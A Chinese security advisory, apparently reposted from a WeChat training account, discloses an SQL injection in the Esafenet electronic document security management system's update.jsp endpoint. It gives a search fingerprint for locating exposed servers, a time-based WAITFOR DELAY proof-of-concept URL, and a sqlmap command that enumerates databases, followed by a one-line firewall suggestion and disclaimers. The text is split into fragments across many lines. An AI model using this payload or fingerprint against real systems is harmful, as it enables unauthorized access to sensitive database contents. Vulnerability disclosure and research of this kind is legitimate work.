本文由掌控安全学院 - 会唱会跳会敲键盘 投稿
0x01 漏洞介绍
亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
0x02 影响产品
亿赛通电子文档安全管理系统
0x03 语法特征
app
=
"亿赛通-电子文档安全管理系统"
0x04 漏洞复现
页面
POC
CDGServer3
/
workflowE
/
useractivate
/
update
.
jsp
?
flag
=
1
&
ids
=
1
,
3
);
WAITFOR
%
20DELAY
%
20
%
270
:
0
:值%
27
--
修改值的大小 对应延迟时间
python3 sqlmap
.
py
-
u
"https://xxxxx/CDGServer3/workflowE/useractiv
ate/update.jsp?flag=1&ids=1,3)"
--
batch
--
dbs
0x05 漏洞修复建议
设置防火墙规则,过滤漏洞相关的敏感链接监测
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):亿赛通电子文档安全管理系统 Update.jsp SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论